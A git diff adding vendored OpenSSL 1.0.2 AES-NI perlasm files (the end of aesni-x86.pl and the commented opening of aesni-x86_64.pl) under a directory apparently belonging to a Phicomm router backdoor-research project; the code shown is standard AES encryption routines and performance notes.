+	&jz	(&label("xts_dec_ret"));
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save $len%16
+	&jmp	(&label("xts_dec_only_one_more"));
+
+&set_label("xts_dec_done",16);
+	&mov	($len,&DWP(16*7+0,"esp"));	# restore original $len
+	&pxor	($twtmp,$twtmp);
+	&and	($len,15);
+	&jz	(&label("xts_dec_ret"));
+
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save $len%16
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($twmask,&QWP(16*6,"esp"));
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+
+&set_label("xts_dec_only_one_more");
+	&pshufd	($inout3,$twtmp,0x13);
+	&movdqa	($inout4,$tweak);		# put aside previous tweak
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($inout3,$twmask);		# isolate carry and residue
+	&pxor	($inout3,$tweak);
+
+	&mov	($key,$key_);			# restore $key
+	&mov	($rounds,$rounds_);		# restore $rounds
+
+	&movups	($inout0,&QWP(0,$inp));		# load input
+	&xorps	($inout0,$inout3);		# input^=tweak
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&movups	(&QWP(0,$out),$inout0);		# write output
+
+&set_label("xts_dec_steal");
+	&movz	($rounds,&BP(16,$inp));
+	&movz	($key,&BP(0,$out));
+	&lea	($inp,&DWP(1,$inp));
+	&mov	(&BP(0,$out),&LB($rounds));
+	&mov	(&BP(16,$out),&LB($key));
+	&lea	($out,&DWP(1,$out));
+	&sub	($len,1);
+	&jnz	(&label("xts_dec_steal"));
+
+	&sub	($out,&DWP(16*7+0,"esp"));	# rewind $out
+	&mov	($key,$key_);			# restore $key
+	&mov	($rounds,$rounds_);		# restore $rounds
+
+	&movups	($inout0,&QWP(0,$out));		# load input
+	&xorps	($inout0,$inout4);		# input^=tweak
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&xorps	($inout0,$inout4);		# output^=tweak
+	&movups	(&QWP(0,$out),$inout0);		# write output
+
+&set_label("xts_dec_ret");
+	&mov	("esp",&DWP(16*7+4,"esp"));	# restore %esp
+&function_end("aesni_xts_decrypt");
+}
+}
+
+######################################################################
+# void $PREFIX_cbc_encrypt (const void *inp, void *out,
+#                           size_t length, const AES_KEY *key,
+#                           unsigned char *ivp,const int enc);
+&function_begin("${PREFIX}_cbc_encrypt");
+	&mov	($inp,&wparam(0));
+	&mov	($rounds_,"esp");
+	&mov	($out,&wparam(1));
+	&sub	($rounds_,24);
+	&mov	($len,&wparam(2));
+	&and	($rounds_,-16);
+	&mov	($key,&wparam(3));
+	&mov	($key_,&wparam(4));
+	&test	($len,$len);
+	&jz	(&label("cbc_abort"));
+
+	&cmp	(&wparam(5),0);
+	&xchg	($rounds_,"esp");		# alloca
+	&movups	($ivec,&QWP(0,$key_));		# load IV
+	&mov	($rounds,&DWP(240,$key));
+	&mov	($key_,$key);			# backup $key
+	&mov	(&DWP(16,"esp"),$rounds_);	# save original %esp
+	&mov	($rounds_,$rounds);		# backup $rounds
+	&je	(&label("cbc_decrypt"));
+
+	&movaps	($inout0,$ivec);
+	&cmp	($len,16);
+	&jb	(&label("cbc_enc_tail"));
+	&sub	($len,16);
+	&jmp	(&label("cbc_enc_loop"));
+
+&set_label("cbc_enc_loop",16);
+	&movups	($ivec,&QWP(0,$inp));		# input actually
+	&lea	($inp,&DWP(16,$inp));
+	if ($inline)
+	{   &aesni_inline_generate1("enc",$inout0,$ivec);	}
+	else
+	{   &xorps($inout0,$ivec); &call("_aesni_encrypt1");	}
+	&mov	($rounds,$rounds_);	# restore $rounds
+	&mov	($key,$key_);		# restore $key
+	&movups	(&QWP(0,$out),$inout0);	# store output
+	&lea	($out,&DWP(16,$out));
+	&sub	($len,16);
+	&jnc	(&label("cbc_enc_loop"));
+	&add	($len,16);
+	&jnz	(&label("cbc_enc_tail"));
+	&movaps	($ivec,$inout0);
+	&jmp	(&label("cbc_ret"));
+
+&set_label("cbc_enc_tail");
+	&mov	("ecx",$len);		# zaps $rounds
+	&data_word(0xA4F3F689);		# rep movsb
+	&mov	("ecx",16);		# zero tail
+	&sub	("ecx",$len);
+	&xor	("eax","eax");		# zaps $len
+	&data_word(0xAAF3F689);		# rep stosb
+	&lea	($out,&DWP(-16,$out));	# rewind $out by 1 block
+	&mov	($rounds,$rounds_);	# restore $rounds
+	&mov	($inp,$out);		# $inp and $out are the same
+	&mov	($key,$key_);		# restore $key
+	&jmp	(&label("cbc_enc_loop"));
+######################################################################
+&set_label("cbc_decrypt",16);
+	&cmp	($len,0x50);
+	&jbe	(&label("cbc_dec_tail"));
+	&movaps	(&QWP(0,"esp"),$ivec);		# save IV
+	&sub	($len,0x50);
+	&jmp	(&label("cbc_dec_loop6_enter"));
+
+&set_label("cbc_dec_loop6",16);
+	&movaps	(&QWP(0,"esp"),$rndkey0);	# save IV
+	&movups	(&QWP(0,$out),$inout5);
+	&lea	($out,&DWP(0x10,$out));
+&set_label("cbc_dec_loop6_enter");
+	&movdqu	($inout0,&QWP(0,$inp));
+	&movdqu	($inout1,&QWP(0x10,$inp));
+	&movdqu	($inout2,&QWP(0x20,$inp));
+	&movdqu	($inout3,&QWP(0x30,$inp));
+	&movdqu	($inout4,&QWP(0x40,$inp));
+	&movdqu	($inout5,&QWP(0x50,$inp));
+
+	&call	("_aesni_decrypt6");
+
+	&movups	($rndkey1,&QWP(0,$inp));
+	&movups	($rndkey0,&QWP(0x10,$inp));
+	&xorps	($inout0,&QWP(0,"esp"));	# ^=IV
+	&xorps	($inout1,$rndkey1);
+	&movups	($rndkey1,&QWP(0x20,$inp));
+	&xorps	($inout2,$rndkey0);
+	&movups	($rndkey0,&QWP(0x30,$inp));
+	&xorps	($inout3,$rndkey1);
+	&movups	($rndkey1,&QWP(0x40,$inp));
+	&xorps	($inout4,$rndkey0);
+	&movups	($rndkey0,&QWP(0x50,$inp));	# IV
+	&xorps	($inout5,$rndkey1);
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&lea	($inp,&DWP(0x60,$inp));
+	&movups	(&QWP(0x20,$out),$inout2);
+	&mov	($rounds,$rounds_);		# restore $rounds
+	&movups	(&QWP(0x30,$out),$inout3);
+	&mov	($key,$key_);			# restore $key
+	&movups	(&QWP(0x40,$out),$inout4);
+	&lea	($out,&DWP(0x50,$out));
+	&sub	($len,0x60);
+	&ja	(&label("cbc_dec_loop6"));
+
+	&movaps	($inout0,$inout5);
+	&movaps	($ivec,$rndkey0);
+	&add	($len,0x50);
+	&jle	(&label("cbc_dec_tail_collected"));
+	&movups	(&QWP(0,$out),$inout0);
+	&lea	($out,&DWP(0x10,$out));
+&set_label("cbc_dec_tail");
+	&movups	($inout0,&QWP(0,$inp));
+	&movaps	($in0,$inout0);
+	&cmp	($len,0x10);
+	&jbe	(&label("cbc_dec_one"));
+
+	&movups	($inout1,&QWP(0x10,$inp));
+	&movaps	($in1,$inout1);
+	&cmp	($len,0x20);
+	&jbe	(&label("cbc_dec_two"));
+
+	&movups	($inout2,&QWP(0x20,$inp));
+	&cmp	($len,0x30);
+	&jbe	(&label("cbc_dec_three"));
+
+	&movups	($inout3,&QWP(0x30,$inp));
+	&cmp	($len,0x40);
+	&jbe	(&label("cbc_dec_four"));
+
+	&movups	($inout4,&QWP(0x40,$inp));
+	&movaps	(&QWP(0,"esp"),$ivec);		# save IV
+	&movups	($inout0,&QWP(0,$inp));
+	&xorps	($inout5,$inout5);
+	&call	("_aesni_decrypt6");
+	&movups	($rndkey1,&QWP(0,$inp));
+	&movups	($rndkey0,&QWP(0x10,$inp));
+	&xorps	($inout0,&QWP(0,"esp"));	# ^= IV
+	&xorps	($inout1,$rndkey1);
+	&movups	($rndkey1,&QWP(0x20,$inp));
+	&xorps	($inout2,$rndkey0);
+	&movups	($rndkey0,&QWP(0x30,$inp));
+	&xorps	($inout3,$rndkey1);
+	&movups	($ivec,&QWP(0x40,$inp));	# IV
+	&xorps	($inout4,$rndkey0);
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&lea	($out,&DWP(0x40,$out));
+	&movaps	($inout0,$inout4);
+	&sub	($len,0x50);
+	&jmp	(&label("cbc_dec_tail_collected"));
+
+&set_label("cbc_dec_one",16);
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&xorps	($inout0,$ivec);
+	&movaps	($ivec,$in0);
+	&sub	($len,0x10);
+	&jmp	(&label("cbc_dec_tail_collected"));
+
+&set_label("cbc_dec_two",16);
+	&call	("_aesni_decrypt2");
+	&xorps	($inout0,$ivec);
+	&xorps	($inout1,$in0);
+	&movups	(&QWP(0,$out),$inout0);
+	&movaps	($inout0,$inout1);
+	&lea	($out,&DWP(0x10,$out));
+	&movaps	($ivec,$in1);
+	&sub	($len,0x20);
+	&jmp	(&label("cbc_dec_tail_collected"));
+
+&set_label("cbc_dec_three",16);
+	&call	("_aesni_decrypt3");
+	&xorps	($inout0,$ivec);
+	&xorps	($inout1,$in0);
+	&xorps	($inout2,$in1);
+	&movups	(&QWP(0,$out),$inout0);
+	&movaps	($inout0,$inout2);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&lea	($out,&DWP(0x20,$out));
+	&movups	($ivec,&QWP(0x20,$inp));
+	&sub	($len,0x30);
+	&jmp	(&label("cbc_dec_tail_collected"));
+
+&set_label("cbc_dec_four",16);
+	&call	("_aesni_decrypt4");
+	&movups	($rndkey1,&QWP(0x10,$inp));
+	&movups	($rndkey0,&QWP(0x20,$inp));
+	&xorps	($inout0,$ivec);
+	&movups	($ivec,&QWP(0x30,$inp));
+	&xorps	($inout1,$in0);
+	&movups	(&QWP(0,$out),$inout0);
+	&xorps	($inout2,$rndkey1);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&xorps	($inout3,$rndkey0);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&lea	($out,&DWP(0x30,$out));
+	&movaps	($inout0,$inout3);
+	&sub	($len,0x40);
+
+&set_label("cbc_dec_tail_collected");
+	&and	($len,15);
+	&jnz	(&label("cbc_dec_tail_partial"));
+	&movups	(&QWP(0,$out),$inout0);
+	&jmp	(&label("cbc_ret"));
+
+&set_label("cbc_dec_tail_partial",16);
+	&movaps	(&QWP(0,"esp"),$inout0);
+	&mov	("ecx",16);
+	&mov	($inp,"esp");
+	&sub	("ecx",$len);
+	&data_word(0xA4F3F689);		# rep movsb
+
+&set_label("cbc_ret");
+	&mov	("esp",&DWP(16,"esp"));	# pull original %esp
+	&mov	($key_,&wparam(4));
+	&movups	(&QWP(0,$key_),$ivec);	# output IV
+&set_label("cbc_abort");
+&function_end("${PREFIX}_cbc_encrypt");
+
+######################################################################
+# Mechanical port from aesni-x86_64.pl.
+#
+# _aesni_set_encrypt_key is private interface,
+# input:
+#	"eax"	const unsigned char *userKey
+#	$rounds	int bits
+#	$key	AES_KEY *key
+# output:
+#	"eax"	return code
+#	$round	rounds
+
+&function_begin_B("_aesni_set_encrypt_key");
+	&test	("eax","eax");
+	&jz	(&label("bad_pointer"));
+	&test	($key,$key);
+	&jz	(&label("bad_pointer"));
+
+	&movups	("xmm0",&QWP(0,"eax"));	# pull first 128 bits of *userKey
+	&xorps	("xmm4","xmm4");	# low dword of xmm4 is assumed 0
+	&lea	($key,&DWP(16,$key));
+	&cmp	($rounds,256);
+	&je	(&label("14rounds"));
+	&cmp	($rounds,192);
+	&je	(&label("12rounds"));
+	&cmp	($rounds,128);
+	&jne	(&label("bad_keybits"));
+
+&set_label("10rounds",16);
+	&mov		($rounds,9);
+	&$movekey	(&QWP(-16,$key),"xmm0");	# round 0
+	&aeskeygenassist("xmm1","xmm0",0x01);		# round 1
+	&call		(&label("key_128_cold"));
+	&aeskeygenassist("xmm1","xmm0",0x2);		# round 2
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x04);		# round 3
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x08);		# round 4
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x10);		# round 5
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x20);		# round 6
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x40);		# round 7
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x80);		# round 8
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x1b);		# round 9
+	&call		(&label("key_128"));
+	&aeskeygenassist("xmm1","xmm0",0x36);		# round 10
+	&call		(&label("key_128"));
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&mov		(&DWP(80,$key),$rounds);
+	&xor		("eax","eax");
+	&ret();
+
+&set_label("key_128",16);
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&lea		($key,&DWP(16,$key));
+&set_label("key_128_cold");
+	&shufps		("xmm4","xmm0",0b00010000);
+	&xorps		("xmm0","xmm4");
+	&shufps		("xmm4","xmm0",0b10001100);
+	&xorps		("xmm0","xmm4");
+	&shufps		("xmm1","xmm1",0b11111111);	# critical path
+	&xorps		("xmm0","xmm1");
+	&ret();
+
+&set_label("12rounds",16);
+	&movq		("xmm2",&QWP(16,"eax"));	# remaining 1/3 of *userKey
+	&mov		($rounds,11);
+	&$movekey	(&QWP(-16,$key),"xmm0");	# round 0
+	&aeskeygenassist("xmm1","xmm2",0x01);		# round 1,2
+	&call		(&label("key_192a_cold"));
+	&aeskeygenassist("xmm1","xmm2",0x02);		# round 2,3
+	&call		(&label("key_192b"));
+	&aeskeygenassist("xmm1","xmm2",0x04);		# round 4,5
+	&call		(&label("key_192a"));
+	&aeskeygenassist("xmm1","xmm2",0x08);		# round 5,6
+	&call		(&label("key_192b"));
+	&aeskeygenassist("xmm1","xmm2",0x10);		# round 7,8
+	&call		(&label("key_192a"));
+	&aeskeygenassist("xmm1","xmm2",0x20);		# round 8,9
+	&call		(&label("key_192b"));
+	&aeskeygenassist("xmm1","xmm2",0x40);		# round 10,11
+	&call		(&label("key_192a"));
+	&aeskeygenassist("xmm1","xmm2",0x80);		# round 11,12
+	&call		(&label("key_192b"));
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&mov		(&DWP(48,$key),$rounds);
+	&xor		("eax","eax");
+	&ret();
+
+&set_label("key_192a",16);
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&lea		($key,&DWP(16,$key));
+&set_label("key_192a_cold",16);
+	&movaps		("xmm5","xmm2");
+&set_label("key_192b_warm");
+	&shufps		("xmm4","xmm0",0b00010000);
+	&movdqa		("xmm3","xmm2");
+	&xorps		("xmm0","xmm4");
+	&shufps		("xmm4","xmm0",0b10001100);
+	&pslldq		("xmm3",4);
+	&xorps		("xmm0","xmm4");
+	&pshufd		("xmm1","xmm1",0b01010101);	# critical path
+	&pxor		("xmm2","xmm3");
+	&pxor		("xmm0","xmm1");
+	&pshufd		("xmm3","xmm0",0b11111111);
+	&pxor		("xmm2","xmm3");
+	&ret();
+
+&set_label("key_192b",16);
+	&movaps		("xmm3","xmm0");
+	&shufps		("xmm5","xmm0",0b01000100);
+	&$movekey	(&QWP(0,$key),"xmm5");
+	&shufps		("xmm3","xmm2",0b01001110);
+	&$movekey	(&QWP(16,$key),"xmm3");
+	&lea		($key,&DWP(32,$key));
+	&jmp		(&label("key_192b_warm"));
+
+&set_label("14rounds",16);
+	&movups		("xmm2",&QWP(16,"eax"));	# remaining half of *userKey
+	&mov		($rounds,13);
+	&lea		($key,&DWP(16,$key));
+	&$movekey	(&QWP(-32,$key),"xmm0");	# round 0
+	&$movekey	(&QWP(-16,$key),"xmm2");	# round 1
+	&aeskeygenassist("xmm1","xmm2",0x01);		# round 2
+	&call		(&label("key_256a_cold"));
+	&aeskeygenassist("xmm1","xmm0",0x01);		# round 3
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x02);		# round 4
+	&call		(&label("key_256a"));
+	&aeskeygenassist("xmm1","xmm0",0x02);		# round 5
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x04);		# round 6
+	&call		(&label("key_256a"));
+	&aeskeygenassist("xmm1","xmm0",0x04);		# round 7
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x08);		# round 8
+	&call		(&label("key_256a"));
+	&aeskeygenassist("xmm1","xmm0",0x08);		# round 9
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x10);		# round 10
+	&call		(&label("key_256a"));
+	&aeskeygenassist("xmm1","xmm0",0x10);		# round 11
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x20);		# round 12
+	&call		(&label("key_256a"));
+	&aeskeygenassist("xmm1","xmm0",0x20);		# round 13
+	&call		(&label("key_256b"));
+	&aeskeygenassist("xmm1","xmm2",0x40);		# round 14
+	&call		(&label("key_256a"));
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&mov		(&DWP(16,$key),$rounds);
+	&xor		("eax","eax");
+	&ret();
+
+&set_label("key_256a",16);
+	&$movekey	(&QWP(0,$key),"xmm2");
+	&lea		($key,&DWP(16,$key));
+&set_label("key_256a_cold");
+	&shufps		("xmm4","xmm0",0b00010000);
+	&xorps		("xmm0","xmm4");
+	&shufps		("xmm4","xmm0",0b10001100);
+	&xorps		("xmm0","xmm4");
+	&shufps		("xmm1","xmm1",0b11111111);	# critical path
+	&xorps		("xmm0","xmm1");
+	&ret();
+
+&set_label("key_256b",16);
+	&$movekey	(&QWP(0,$key),"xmm0");
+	&lea		($key,&DWP(16,$key));
+
+	&shufps		("xmm4","xmm2",0b00010000);
+	&xorps		("xmm2","xmm4");
+	&shufps		("xmm4","xmm2",0b10001100);
+	&xorps		("xmm2","xmm4");
+	&shufps		("xmm1","xmm1",0b10101010);	# critical path
+	&xorps		("xmm2","xmm1");
+	&ret();
+
+&set_label("bad_pointer",4);
+	&mov	("eax",-1);
+	&ret	();
+&set_label("bad_keybits",4);
+	&mov	("eax",-2);
+	&ret	();
+&function_end_B("_aesni_set_encrypt_key");
+
+# int $PREFIX_set_encrypt_key (const unsigned char *userKey, int bits,
+#                              AES_KEY *key)
+&function_begin_B("${PREFIX}_set_encrypt_key");
+	&mov	("eax",&wparam(0));
+	&mov	($rounds,&wparam(1));
+	&mov	($key,&wparam(2));
+	&call	("_aesni_set_encrypt_key");
+	&ret	();
+&function_end_B("${PREFIX}_set_encrypt_key");
+
+# int $PREFIX_set_decrypt_key (const unsigned char *userKey, int bits,
+#                              AES_KEY *key)
+&function_begin_B("${PREFIX}_set_decrypt_key");
+	&mov	("eax",&wparam(0));
+	&mov	($rounds,&wparam(1));
+	&mov	($key,&wparam(2));
+	&call	("_aesni_set_encrypt_key");
+	&mov	($key,&wparam(2));
+	&shl	($rounds,4);	# rounds-1 after _aesni_set_encrypt_key
+	&test	("eax","eax");
+	&jnz	(&label("dec_key_ret"));
+	&lea	("eax",&DWP(16,$key,$rounds));	# end of key schedule
+
+	&$movekey	("xmm0",&QWP(0,$key));	# just swap
+	&$movekey	("xmm1",&QWP(0,"eax"));
+	&$movekey	(&QWP(0,"eax"),"xmm0");
+	&$movekey	(&QWP(0,$key),"xmm1");
+	&lea		($key,&DWP(16,$key));
+	&lea		("eax",&DWP(-16,"eax"));
+
+&set_label("dec_key_inverse");
+	&$movekey	("xmm0",&QWP(0,$key));	# swap and inverse
+	&$movekey	("xmm1",&QWP(0,"eax"));
+	&aesimc		("xmm0","xmm0");
+	&aesimc		("xmm1","xmm1");
+	&lea		($key,&DWP(16,$key));
+	&lea		("eax",&DWP(-16,"eax"));
+	&$movekey	(&QWP(16,"eax"),"xmm0");
+	&$movekey	(&QWP(-16,$key),"xmm1");
+	&cmp		("eax",$key);
+	&ja		(&label("dec_key_inverse"));
+
+	&$movekey	("xmm0",&QWP(0,$key));	# inverse middle
+	&aesimc		("xmm0","xmm0");
+	&$movekey	(&QWP(0,$key),"xmm0");
+
+	&xor		("eax","eax");		# return success
+&set_label("dec_key_ret");
+	&ret	();
+&function_end_B("${PREFIX}_set_decrypt_key");
+&asciz("AES for Intel AES-NI, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86_64.pl
new file mode 100644
index 0000000..5f61746
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86_64.pl
@@ -0,0 +1,3555 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# This module implements support for Intel AES-NI extension. In
+# OpenSSL context it's used with Intel engine, but can also be used as
+# drop-in replacement for crypto/aes/asm/aes-x86_64.pl [see below for
+# details].
+#
+# Performance.
+#
+# Given aes(enc|dec) instructions' latency asymptotic performance for
+# non-parallelizable modes such as CBC encrypt is 3.75 cycles per byte
+# processed with 128-bit key. And given their throughput asymptotic
+# performance for parallelizable modes is 1.25 cycles per byte. Being
+# asymptotic limit it's not something you commonly achieve in reality,
+# but how close does one get? Below are results collected for
+# different modes and block sized. Pairs of numbers are for en-/
+# decryption.
+#
+#	16-byte     64-byte     256-byte    1-KB        8-KB
+# ECB	4.25/4.25   1.38/1.38   1.28/1.28   1.26/1.26	1.26/1.26
+# CTR	5.42/5.42   1.92/1.92   1.44/1.44   1.28/1.28   1.26/1.26
+# CBC	4.38/4.43   4.15/1.43   4.07/1.32   4.07/1.29   4.06/1.28
+# CCM	5.66/9.42   4.42/5.41   4.16/4.40   4.09/4.15   4.06/4.07   
+# OFB	5.42/5.42   4.64/4.64   4.44/4.44   4.39/4.39   4.38/4.38
+# CFB	5.73/5.85   5.56/5.62   5.48/5.56   5.47/5.55   5.47/5.55
+#
+# ECB, CTR, CBC and CCM results are free from EVP overhead. This means
+# that otherwise used 'openssl speed -evp aes-128-??? -engine aesni
+# [-decrypt]' will exhibit 10-15% worse results for smaller blocks.
+# The results were collected with specially crafted speed.c benchmark
+# in order to compare them with results reported in "Intel Advanced
+# Encryption Standard (AES) New Instruction Set" White Paper Revision
+# 3.0 dated May 2010. All above results are consistently better. This
+# module also provides better performance for block sizes smaller than
+# 128 bytes in points *not* represented in the above table.
+#
+# Looking at the results for 8-KB buffer.
+#
+# CFB and OFB results are far from the limit, because implementation
+# uses "generic" CRYPTO_[c|o]fb128_encrypt interfaces relying on
+# single-block aesni_encrypt, which is not the most optimal way to go.
+# CBC encrypt result is unexpectedly high and there is no documented
+# explanation for it. Seemingly there is a small penalty for feeding
+# the result back to AES unit the way it's done in CBC mode. There is
+# nothing one can do and the result appears optimal. CCM result is
+# identical to CBC, because CBC-MAC is essentially CBC encrypt without
+# saving output. CCM CTR "stays invisible," because it's neatly
+# interleaved wih CBC-MAC. This provides ~30% improvement over
+# "straghtforward" CCM implementation with CTR and CBC-MAC performed
+# disjointly. Parallelizable modes practically achieve the theoretical
+# limit.
+#
+# Looking at how results vary with buffer size.
+#
+# Curves are practically saturated at 1-KB buffer size. In most cases
+# "256-byte" performance is >95%, and "64-byte" is ~90% of "8-KB" one.
+# CTR curve doesn't follow this pattern and is "slowest" changing one
+# with "256-byte" result being 87% of "8-KB." This is because overhead
+# in CTR mode is most computationally intensive. Small-block CCM
+# decrypt is slower than encrypt, because first CTR and last CBC-MAC
+# iterations can't be interleaved.
+#
+# Results for 192- and 256-bit keys.
+#
+# EVP-free results were observed to scale perfectly with number of
+# rounds for larger block sizes, i.e. 192-bit result being 10/12 times
+# lower and 256-bit one - 10/14. Well, in CBC encrypt case differences
+# are a tad smaller, because the above mentioned penalty biases all
+# results by same constant value. In similar way function call
+# overhead affects small-block performance, as well as OFB and CFB
+# results. Differences are not large, most common coefficients are
+# 10/11.7 and 10/13.4 (as opposite to 10/12.0 and 10/14.0), but one
+# observe even 10/11.2 and 10/12.4 (CTR, OFB, CFB)...
+
+# January 2011
+#
+# While Westmere processor features 6 cycles latency for aes[enc|dec]
+# instructions, which can be scheduled every second cycle, Sandy
+# Bridge spends 8 cycles per instruction, but it can schedule them
+# every cycle. This means that code targeting Westmere would perform
+# suboptimally on Sandy Bridge. Therefore this update.
+#
+# In addition, non-parallelizable CBC encrypt (as well as CCM) is
+# optimized. Relative improvement might appear modest, 8% on Westmere,
+# but in absolute terms it's 3.77 cycles per byte encrypted with
+# 128-bit key on Westmere, and 5.07 - on Sandy Bridge. These numbers
+# should be compared to asymptotic limits of 3.75 for Westmere and
+# 5.00 for Sandy Bridge. Actually, the fact that they get this close
+# to asymptotic limits is quite amazing. Indeed, the limit is
+# calculated as latency times number of rounds, 10 for 128-bit key,
+# and divided by 16, the number of bytes in block, or in other words
+# it accounts *solely* for aesenc instructions. But there are extra
+# instructions, and numbers so close to the asymptotic limits mean
+# that it's as if it takes as little as *one* additional cycle to
+# execute all of them. How is it possible? It is possible thanks to
+# out-of-order execution logic, which manages to overlap post-
+# processing of previous block, things like saving the output, with
+# actual encryption of current block, as well as pre-processing of
+# current block, things like fetching input and xor-ing it with
+# 0-round element of the key schedule, with actual encryption of
+# previous block. Keep this in mind...
+#
+# For parallelizable modes, such as ECB, CBC decrypt, CTR, higher
+# performance is achieved by interleaving instructions working on
+# independent blocks. In which case asymptotic limit for such modes
+# can be obtained by dividing above mentioned numbers by AES
+# instructions' interleave factor. Westmere can execute at most 3 
+# instructions at a time, meaning that optimal interleave factor is 3,
+# and that's where the "magic" number of 1.25 come from. "Optimal
+# interleave factor" means that increase of interleave factor does
+# not improve performance. The formula has proven to reflect reality
+# pretty well on Westmere... Sandy Bridge on the other hand can
+# execute up to 8 AES instructions at a time, so how does varying
+# interleave factor affect the performance? Here is table for ECB
+# (numbers are cycles per byte processed with 128-bit key):
+#
+# instruction interleave factor		3x	6x	8x
+# theoretical asymptotic limit		1.67	0.83	0.625
+# measured performance for 8KB block	1.05	0.86	0.84
+#
+# "as if" interleave factor		4.7x	5.8x	6.0x
+#
+# Further data for other parallelizable modes:
+#
+# CBC decrypt				1.16	0.93	0.74
+# CTR					1.14	0.91	0.74
+#
+# Well, given 3x column it's probably inappropriate to call the limit
+# asymptotic, if it can be surpassed, isn't it? What happens there?
+# Rewind to CBC paragraph for the answer. Yes, out-of-order execution
+# magic is responsible for this. Processor overlaps not only the
+# additional instructions with AES ones, but even AES instuctions
+# processing adjacent triplets of independent blocks. In the 6x case
+# additional instructions  still claim disproportionally small amount
+# of additional cycles, but in 8x case number of instructions must be
+# a tad too high for out-of-order logic to cope with, and AES unit
+# remains underutilized... As you can see 8x interleave is hardly
+# justifiable, so there no need to feel bad that 32-bit aesni-x86.pl
+# utilizies 6x interleave because of limited register bank capacity.
+#
+# Higher interleave factors do have negative impact on Westmere
+# performance. While for ECB mode it's negligible ~1.5%, other
+# parallelizables perform ~5% worse, which is outweighed by ~25%
+# improvement on Sandy Bridge. To balance regression on Westmere
+# CTR mode was implemented with 6x aesenc interleave factor.
+
+# April 2011
+#
+# Add aesni_xts_[en|de]crypt. Westmere spends 1.25 cycles processing
+# one byte out of 8KB with 128-bit key, Sandy Bridge - 0.90. Just like
+# in CTR mode AES instruction interleave factor was chosen to be 6x.
+
+######################################################################
+# Current large-block performance in cycles per byte processed with
+# 128-bit key (less is better).
+#
+#		CBC en-/decrypt	CTR	XTS	ECB
+# Westmere	3.77/1.25	1.25	1.25	1.26
+# * Bridge	5.07/0.74	0.75	0.90	0.85
+# Haswell	4.44/0.63	0.63	0.73	0.63
+# Atom		5.75/3.54	3.56	4.12	3.87(*)
+# Bulldozer	5.77/0.70	0.72	0.90	0.70
+#
+# (*)	Atom ECB result is suboptimal because of penalties incurred
+#	by operations on %xmm8-15. As ECB is not considered
+#	critical, nothing was done to mitigate the problem.
+
+$PREFIX="aesni";	# if $PREFIX is set to "AES", the script
+			# generates drop-in replacement for
+			# crypto/aes/asm/aes-x86_64.pl:-)
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$movkey = $PREFIX eq "aesni" ? "movups" : "movups";
+@_4args=$win64?	("%rcx","%rdx","%r8", "%r9") :	# Win64 order
+		("%rdi","%rsi","%rdx","%rcx");	# Unix order
+
+$code=".text\n";
+$code.=".extern	OPENSSL_ia32cap_P\n";
+
+$rounds="%eax";	# input to and changed by aesni_[en|de]cryptN !!!
